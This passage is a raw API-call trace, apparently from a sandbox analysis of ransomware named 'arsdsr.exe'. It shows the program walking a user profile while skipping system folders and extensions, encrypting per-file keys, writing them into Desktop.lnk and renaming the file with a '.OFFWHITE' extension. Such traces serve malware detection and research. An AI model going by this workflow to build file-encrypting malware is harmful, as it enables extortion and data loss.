Live.url", lpString2="programdata") returned -1 [0152.583] lstrcmpiW (lpString1="Get Windows Live.url", lpString2="appdata") returned 1 [0152.583] lstrcmpiW (lpString1="Get Windows Live.url", lpString2="program files") returned -1 [0152.583] lstrcmpiW (lpString1="Get Windows Live.url", lpString2="program files (x86)") returned -1 [0152.583] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\Default\\Favorites\\Windows Live\\" | out: lpString1="C:/Users\\Default\\Favorites\\Windows Live\\") returned="C:/Users\\Default\\Favorites\\Windows Live\\" [0152.583] lstrcatW (in: lpString1="C:/Users\\Default\\Favorites\\Windows Live\\", lpString2="Get Windows Live.url" | out: lpString1="C:/Users\\Default\\Favorites\\Windows Live\\Get Windows Live.url") returned="C:/Users\\Default\\Favorites\\Windows Live\\Get Windows Live.url" [0152.583] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0152.583] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0152.583] PathFindExtensionW (pszPath="Get Windows Live.url") returned=".url" [0152.583] lstrcmpiW (lpString1=".url", lpString2=".exe") returned 1 [0152.583] lstrcmpiW (lpString1=".url", lpString2=".log") returned 1 [0152.583] lstrcmpiW (lpString1=".url", lpString2=".cab") returned 1 [0152.583] lstrcmpiW (lpString1=".url", lpString2=".cmd") returned 1 [0152.583] lstrcmpiW (lpString1=".url", lpString2=".com") returned 1 [0152.583] lstrcmpiW (lpString1=".url", lpString2=".cpl") returned 1 [0152.583] lstrcmpiW (lpString1=".url", lpString2=".ini") returned 1 [0152.583] lstrcmpiW (lpString1=".url", lpString2=".dll") returned 1 [0152.583] lstrcmpiW (lpString1=".url", lpString2=".url") returned 0 [0152.583] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xa52981, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x3e003c, dwReserved1=0x295e9f0, cFileName="Windows Live Gallery.url", cAlternateFileName="WINDOW~2.URL")) returned 1 [0152.583] lstrcmpiW (lpString1="Windows Live Gallery.url", lpString2=".") returned 1 [0152.583] lstrcmpiW (lpString1="Windows Live Gallery.url", lpString2="..") returned 1 [0152.583] lstrcmpiW (lpString1="Windows Live Gallery.url", lpString2="...") returned 1 [0152.583] lstrcmpiW (lpString1="Windows Live Gallery.url", lpString2="windows") returned 1 [0152.583] lstrcmpiW (lpString1="Windows Live Gallery.url", lpString2="$recycle.bin") returned 1 [0152.583] lstrcmpiW (lpString1="Windows Live Gallery.url", lpString2="rsa") returned 1 [0152.583] lstrcmpiW (lpString1="Windows Live Gallery.url", lpString2="ntuser.dat") returned 1 [0152.583] lstrcmpiW (lpString1="Windows Live Gallery.url", lpString2="programdata") returned 1 [0152.583] lstrcmpiW (lpString1="Windows Live Gallery.url", lpString2="appdata") returned 1 [0152.583] lstrcmpiW (lpString1="Windows Live Gallery.url", lpString2="program files") returned 1 [0152.583] lstrcmpiW (lpString1="Windows Live Gallery.url", lpString2="program files (x86)") returned 1 [0152.583] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\Default\\Favorites\\Windows Live\\" | out: lpString1="C:/Users\\Default\\Favorites\\Windows Live\\") returned="C:/Users\\Default\\Favorites\\Windows Live\\" [0152.583] lstrcatW (in: lpString1="C:/Users\\Default\\Favorites\\Windows Live\\", lpString2="Windows Live Gallery.url" | out: lpString1="C:/Users\\Default\\Favorites\\Windows Live\\Windows Live Gallery.url") returned="C:/Users\\Default\\Favorites\\Windows Live\\Windows Live Gallery.url" [0152.583] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0152.583] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0152.584] PathFindExtensionW (pszPath="Windows Live Gallery.url") returned=".url" [0152.584] lstrcmpiW (lpString1=".url", lpString2=".exe") returned 1 [0152.584] lstrcmpiW (lpString1=".url", lpString2=".log") returned 1 [0152.584] lstrcmpiW (lpString1=".url", lpString2=".cab") returned 1 [0152.584] lstrcmpiW (lpString1=".url", lpString2=".cmd") returned 1 [0152.584] lstrcmpiW (lpString1=".url", lpString2=".com") returned 1 [0152.584] lstrcmpiW (lpString1=".url", lpString2=".cpl") returned 1 [0152.584] lstrcmpiW (lpString1=".url", lpString2=".ini") returned 1 [0152.584] lstrcmpiW (lpString1=".url", lpString2=".dll") returned 1 [0152.584] lstrcmpiW (lpString1=".url", lpString2=".url") returned 0 [0152.584] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xa52981, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x3e003c, dwReserved1=0x295e9f0, cFileName="Windows Live Mail.url", cAlternateFileName="WINDOW~1.URL")) returned 1 [0152.584] lstrcmpiW (lpString1="Windows Live Mail.url", lpString2=".") returned 1 [0152.584] lstrcmpiW (lpString1="Windows Live Mail.url", lpString2="..") returned 1 [0152.584] lstrcmpiW (lpString1="Windows Live Mail.url", lpString2="...") returned 1 [0152.584] lstrcmpiW (lpString1="Windows Live Mail.url", lpString2="windows") returned 1 [0152.584] lstrcmpiW (lpString1="Windows Live Mail.url", lpString2="$recycle.bin") returned 1 [0152.584] lstrcmpiW (lpString1="Windows Live Mail.url", lpString2="rsa") returned 1 [0152.584] lstrcmpiW (lpString1="Windows Live Mail.url", lpString2="ntuser.dat") returned 1 [0152.584] lstrcmpiW (lpString1="Windows Live Mail.url", lpString2="programdata") returned 1 [0152.584] lstrcmpiW (lpString1="Windows Live Mail.url", lpString2="appdata") returned 1 [0152.584] lstrcmpiW (lpString1="Windows Live Mail.url", lpString2="program files") returned 1 [0152.584] lstrcmpiW (lpString1="Windows Live Mail.url", lpString2="program files (x86)") returned 1 [0152.584] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\Default\\Favorites\\Windows Live\\" | out: lpString1="C:/Users\\Default\\Favorites\\Windows Live\\") returned="C:/Users\\Default\\Favorites\\Windows Live\\" [0152.584] lstrcatW (in: lpString1="C:/Users\\Default\\Favorites\\Windows Live\\", lpString2="Windows Live Mail.url" | out: lpString1="C:/Users\\Default\\Favorites\\Windows Live\\Windows Live Mail.url") returned="C:/Users\\Default\\Favorites\\Windows Live\\Windows Live Mail.url" [0152.584] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0152.584] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0152.584] PathFindExtensionW (pszPath="Windows Live Mail.url") returned=".url" [0152.584] lstrcmpiW (lpString1=".url", lpString2=".exe") returned 1 [0152.584] lstrcmpiW (lpString1=".url", lpString2=".log") returned 1 [0152.584] lstrcmpiW (lpString1=".url", lpString2=".cab") returned 1 [0152.584] lstrcmpiW (lpString1=".url", lpString2=".cmd") returned 1 [0152.584] lstrcmpiW (lpString1=".url", lpString2=".com") returned 1 [0152.584] lstrcmpiW (lpString1=".url", lpString2=".cpl") returned 1 [0152.584] lstrcmpiW (lpString1=".url", lpString2=".ini") returned 1 [0152.585] lstrcmpiW (lpString1=".url", lpString2=".dll") returned 1 [0152.585] lstrcmpiW (lpString1=".url", lpString2=".url") returned 0 [0152.585] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xa52981, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x3e003c, dwReserved1=0x295e9f0, cFileName="Windows Live Spaces.url", cAlternateFileName="WINDOW~3.URL")) returned 1 [0152.585] lstrcmpiW (lpString1="Windows Live Spaces.url", lpString2=".") returned 1 [0152.585] lstrcmpiW (lpString1="Windows Live Spaces.url", lpString2="..") returned 1 [0152.585] lstrcmpiW (lpString1="Windows Live Spaces.url", lpString2="...") returned 1 [0152.585] lstrcmpiW (lpString1="Windows Live Spaces.url", lpString2="windows") returned 1 [0152.585] lstrcmpiW (lpString1="Windows Live Spaces.url", lpString2="$recycle.bin") returned 1 [0152.585] lstrcmpiW (lpString1="Windows Live Spaces.url", lpString2="rsa") returned 1 [0152.585] lstrcmpiW (lpString1="Windows Live Spaces.url", lpString2="ntuser.dat") returned 1 [0152.585] lstrcmpiW (lpString1="Windows Live Spaces.url", lpString2="programdata") returned 1 [0152.585] lstrcmpiW (lpString1="Windows Live Spaces.url", lpString2="appdata") returned 1 [0152.585] lstrcmpiW (lpString1="Windows Live Spaces.url", lpString2="program files") returned 1 [0152.585] lstrcmpiW (lpString1="Windows Live Spaces.url", lpString2="program files (x86)") returned 1 [0152.585] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\Default\\Favorites\\Windows Live\\" | out: lpString1="C:/Users\\Default\\Favorites\\Windows Live\\") returned="C:/Users\\Default\\Favorites\\Windows Live\\" [0152.585] lstrcatW (in: lpString1="C:/Users\\Default\\Favorites\\Windows Live\\", lpString2="Windows Live Spaces.url" | out: lpString1="C:/Users\\Default\\Favorites\\Windows Live\\Windows Live Spaces.url") returned="C:/Users\\Default\\Favorites\\Windows Live\\Windows Live Spaces.url" [0152.585] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0152.585] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0152.585] PathFindExtensionW (pszPath="Windows Live Spaces.url") returned=".url" [0152.585] lstrcmpiW (lpString1=".url", lpString2=".exe") returned 1 [0152.585] lstrcmpiW (lpString1=".url", lpString2=".log") returned 1 [0152.585] lstrcmpiW (lpString1=".url", lpString2=".cab") returned 1 [0152.585] lstrcmpiW (lpString1=".url", lpString2=".cmd") returned 1 [0152.585] lstrcmpiW (lpString1=".url", lpString2=".com") returned 1 [0152.585] lstrcmpiW (lpString1=".url", lpString2=".cpl") returned 1 [0152.585] lstrcmpiW (lpString1=".url", lpString2=".ini") returned 1 [0152.585] lstrcmpiW (lpString1=".url", lpString2=".dll") returned 1 [0152.585] lstrcmpiW (lpString1=".url", lpString2=".url") returned 0 [0152.585] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xa52981, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x3e003c, dwReserved1=0x295e9f0, cFileName="Windows Live Spaces.url", cAlternateFileName="WINDOW~3.URL")) returned 0 [0152.585] FindClose (in: hFindFile=0x544650 | out: hFindFile=0x544650) returned 1 [0152.586] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f070, cFileName="Windows Live", cAlternateFileName="WINDOW~1")) returned 0 [0152.586] FindClose (in: hFindFile=0x544610 | out: hFindFile=0x544610) returned 1 [0152.586] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd89738ac, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f6f0, cFileName="Links", cAlternateFileName="")) returned 1 [0152.586] lstrcmpiW (lpString1="Links", lpString2=".") returned 1 [0152.586] lstrcmpiW (lpString1="Links", lpString2="..") returned 1 [0152.586] lstrcmpiW (lpString1="Links", lpString2="...") returned 1 [0152.586] lstrcmpiW (lpString1="Links", lpString2="windows") returned -1 [0152.586] lstrcmpiW (lpString1="Links", lpString2="$recycle.bin") returned 1 [0152.586] lstrcmpiW (lpString1="Links", lpString2="rsa") returned -1 [0152.586] lstrcmpiW (lpString1="Links", lpString2="ntuser.dat") returned -1 [0152.586] lstrcmpiW (lpString1="Links", lpString2="programdata") returned -1 [0152.586] lstrcmpiW (lpString1="Links", lpString2="appdata") returned 1 [0152.586] lstrcmpiW (lpString1="Links", lpString2="program files") returned -1 [0152.586] lstrcmpiW (lpString1="Links", lpString2="program files (x86)") returned -1 [0152.587] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/Users\\Default\\" | out: lpString1="C:/Users\\Default\\") returned="C:/Users\\Default\\" [0152.587] lstrcatW (in: lpString1="C:/Users\\Default\\", lpString2="Links" | out: lpString1="C:/Users\\Default\\Links") returned="C:/Users\\Default\\Links" [0152.587] lstrcatW (in: lpString1="C:/Users\\Default\\Links", lpString2="\\" | out: lpString1="C:/Users\\Default\\Links\\") returned="C:/Users\\Default\\Links\\" [0152.587] lstrcpyW (in: lpString1=0x295e9f0, lpString2="C:/Users\\Default\\Links\\" | out: lpString1="C:/Users\\Default\\Links\\") returned="C:/Users\\Default\\Links\\" [0152.587] lstrcatW (in: lpString1="C:/Users\\Default\\Links\\", lpString2="*.*" | out: lpString1="C:/Users\\Default\\Links\\*.*") returned="C:/Users\\Default\\Links\\*.*" [0152.587] FindFirstFileW (in: lpFileName="C:/Users\\Default\\Links\\*.*", lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd89738ac, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f070, cFileName=".", cAlternateFileName="")) returned 0x544610 [0152.594] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0152.594] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd89738ac, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f070, cFileName="..", cAlternateFileName="")) returned 1 [0152.594] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0152.594] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0152.594] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd89738ac, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x244, dwReserved0=0xa0000003, dwReserved1=0x295f070, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0152.594] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0152.594] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0152.594] lstrcmpiW (lpString1="desktop.ini", lpString2="...") returned 1 [0152.594] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0152.594] lstrcmpiW (lpString1="desktop.ini", lpString2="$recycle.bin") returned 1 [0152.594] lstrcmpiW (lpString1="desktop.ini", lpString2="rsa") returned -1 [0152.594] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0152.594] lstrcmpiW (lpString1="desktop.ini", lpString2="programdata") returned -1 [0152.594] lstrcmpiW (lpString1="desktop.ini", lpString2="appdata") returned 1 [0152.594] lstrcmpiW (lpString1="desktop.ini", lpString2="program files") returned -1 [0152.594] lstrcmpiW (lpString1="desktop.ini", lpString2="program files (x86)") returned -1 [0152.594] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\Default\\Links\\" | out: lpString1="C:/Users\\Default\\Links\\") returned="C:/Users\\Default\\Links\\" [0152.594] lstrcatW (in: lpString1="C:/Users\\Default\\Links\\", lpString2="desktop.ini" | out: lpString1="C:/Users\\Default\\Links\\desktop.ini") returned="C:/Users\\Default\\Links\\desktop.ini" [0152.594] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0152.594] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0152.594] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0152.594] lstrcmpiW (lpString1=".ini", lpString2=".exe") returned 1 [0152.594] lstrcmpiW (lpString1=".ini", lpString2=".log") returned -1 [0152.594] lstrcmpiW (lpString1=".ini", lpString2=".cab") returned 1 [0152.595] lstrcmpiW (lpString1=".ini", lpString2=".cmd") returned 1 [0152.595] lstrcmpiW (lpString1=".ini", lpString2=".com") returned 1 [0152.595] lstrcmpiW (lpString1=".ini", lpString2=".cpl") returned 1 [0152.595] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0152.595] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd89738ac, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x1d3, dwReserved0=0xa0000003, dwReserved1=0x295f070, cFileName="Desktop.lnk", cAlternateFileName="")) returned 1 [0152.595] lstrcmpiW (lpString1="Desktop.lnk", lpString2=".") returned 1 [0152.595] lstrcmpiW (lpString1="Desktop.lnk", lpString2="..") returned 1 [0152.595] lstrcmpiW (lpString1="Desktop.lnk", lpString2="...") returned 1 [0152.595] lstrcmpiW (lpString1="Desktop.lnk", lpString2="windows") returned -1 [0152.595] lstrcmpiW (lpString1="Desktop.lnk", lpString2="$recycle.bin") returned 1 [0152.595] lstrcmpiW (lpString1="Desktop.lnk", lpString2="rsa") returned -1 [0152.595] lstrcmpiW (lpString1="Desktop.lnk", lpString2="ntuser.dat") returned -1 [0152.595] lstrcmpiW (lpString1="Desktop.lnk", lpString2="programdata") returned -1 [0152.595] lstrcmpiW (lpString1="Desktop.lnk", lpString2="appdata") returned 1 [0152.595] lstrcmpiW (lpString1="Desktop.lnk", lpString2="program files") returned -1 [0152.595] lstrcmpiW (lpString1="Desktop.lnk", lpString2="program files (x86)") returned -1 [0152.595] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\Default\\Links\\" | out: lpString1="C:/Users\\Default\\Links\\") returned="C:/Users\\Default\\Links\\" [0152.595] lstrcatW (in: lpString1="C:/Users\\Default\\Links\\", lpString2="Desktop.lnk" | out: lpString1="C:/Users\\Default\\Links\\Desktop.lnk") returned="C:/Users\\Default\\Links\\Desktop.lnk" [0152.595] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0152.595] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0152.595] PathFindExtensionW (pszPath="Desktop.lnk") returned=".lnk" [0152.595] lstrcmpiW (lpString1=".lnk", lpString2=".exe") returned 1 [0152.595] lstrcmpiW (lpString1=".lnk", lpString2=".log") returned -1 [0152.595] lstrcmpiW (lpString1=".lnk", lpString2=".cab") returned 1 [0152.595] lstrcmpiW (lpString1=".lnk", lpString2=".cmd") returned 1 [0152.595] lstrcmpiW (lpString1=".lnk", lpString2=".com") returned 1 [0152.595] lstrcmpiW (lpString1=".lnk", lpString2=".cpl") returned 1 [0152.595] lstrcmpiW (lpString1=".lnk", lpString2=".ini") returned 1 [0152.595] lstrcmpiW (lpString1=".lnk", lpString2=".dll") returned 1 [0152.595] lstrcmpiW (lpString1=".lnk", lpString2=".url") returned -1 [0152.595] lstrcmpiW (lpString1=".lnk", lpString2=".ttf") returned -1 [0152.595] lstrcmpiW (lpString1=".lnk", lpString2=".mp3") returned -1 [0152.595] lstrcmpiW (lpString1=".lnk", lpString2=".pif") returned -1 [0152.595] lstrcmpiW (lpString1=".lnk", lpString2=".mp4") returned -1 [0152.596] lstrcmpiW (lpString1=".lnk", lpString2=".OFFWHITE") returned -1 [0152.596] lstrcmpiW (lpString1=".lnk", lpString2=".msi") returned -1 [0152.596] lstrcmpiW (lpString1="Desktop.lnk", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0152.596] GetProcessHeap () returned 0x500000 [0152.596] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x526df8 [0152.596] CreateFileW (lpFileName="C:/Users\\Default\\Links\\Desktop.lnk" (normalized: "c:\\users\\default\\links\\desktop.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0152.596] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=467) returned 1 [0152.596] GetProcessHeap () returned 0x500000 [0152.596] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543b68 [0152.596] GetProcessHeap () returned 0x500000 [0152.596] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543b80 [0152.596] GetProcessHeap () returned 0x500000 [0152.596] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565e90 [0152.596] GetProcessHeap () returned 0x500000 [0152.596] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565f98 [0152.597] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0152.597] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0152.597] SystemFunction036 (in: RandomBuffer=0x543b68, RandomBufferLength=0x10 | out: RandomBuffer=0x543b68) returned 1 [0152.597] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0152.597] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0152.597] SystemFunction036 (in: RandomBuffer=0x543b80, RandomBufferLength=0x10 | out: RandomBuffer=0x543b80) returned 1 [0152.597] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0152.597] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0152.597] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565e90*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x565e90*, pdwDataLen=0x295e310*=0x100) returned 1 [0152.597] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0152.597] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0152.597] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565f98*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x565f98*, pdwDataLen=0x295e30c*=0x100) returned 1 [0152.597] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x1d3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0152.597] SetLastError (dwErrCode=0x0) [0152.597] WriteFile (in: hFile=0xb0, lpBuffer=0x565e90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x565e90*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0152.599] GetLastError () returned 0x0 [0152.599] GetLastError () returned 0x0 [0152.599] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x2d3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0152.599] WriteFile (in: hFile=0xb0, lpBuffer=0x565f98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x565f98*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0152.599] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x3d3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0152.599] WriteFile (in: hFile=0xb0, lpBuffer=0x526df8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x526df8*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0152.599] GetProcessHeap () returned 0x500000 [0152.599] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1d3) returned 0x52b858 [0152.599] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0152.599] ReadFile (in: hFile=0xb0, lpBuffer=0x52b858, nNumberOfBytesToRead=0x1d3, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x52b858*, lpNumberOfBytesRead=0x295e540*=0x1d3, lpOverlapped=0x0) returned 1 [0152.599] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0152.599] WriteFile (in: hFile=0xb0, lpBuffer=0x52b858*, nNumberOfBytesToWrite=0x1d3, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x52b858*, lpNumberOfBytesWritten=0x295e54c*=0x1d3, lpOverlapped=0x0) returned 1 [0152.600] GetProcessHeap () returned 0x500000 [0152.600] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x52b858 | out: hHeap=0x500000) returned 1 [0152.600] CloseHandle (hObject=0xb0) returned 1 [0152.600] GetProcessHeap () returned 0x500000 [0152.600] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x565e90 | out: hHeap=0x500000) returned 1 [0152.600] GetProcessHeap () returned 0x500000 [0152.600] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x565f98 | out: hHeap=0x500000) returned 1 [0152.600] GetProcessHeap () returned 0x500000 [0152.600] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543b68 | out: hHeap=0x500000) returned 1 [0152.600] GetProcessHeap () returned 0x500000 [0152.600] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543b80 | out: hHeap=0x500000) returned 1 [0152.600] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\Default\\Links\\Desktop.lnk" | out: lpString1="C:/Users\\Default\\Links\\Desktop.lnk") returned="C:/Users\\Default\\Links\\Desktop.lnk" [0152.600] lstrcatW (in: lpString1="C:/Users\\Default\\Links\\Desktop.lnk", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\Default\\Links\\Desktop.lnk.OFFWHITE") returned="C:/Users\\Default\\Links\\Desktop.lnk.OFFWHITE" [0152.600] MoveFileW (lpExistingFileName="C:/Users\\Default\\Links\\Desktop.lnk" (normalized: "c:\\users\\default\\links\\desktop.lnk"), lpNewFileName="C:/Users\\Default\\Links\\Desktop.lnk.OFFWHITE" (normalized: "c:\\users\\default\\links\\desktop.lnk.offwhite")) returned 1 [0152.601] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: 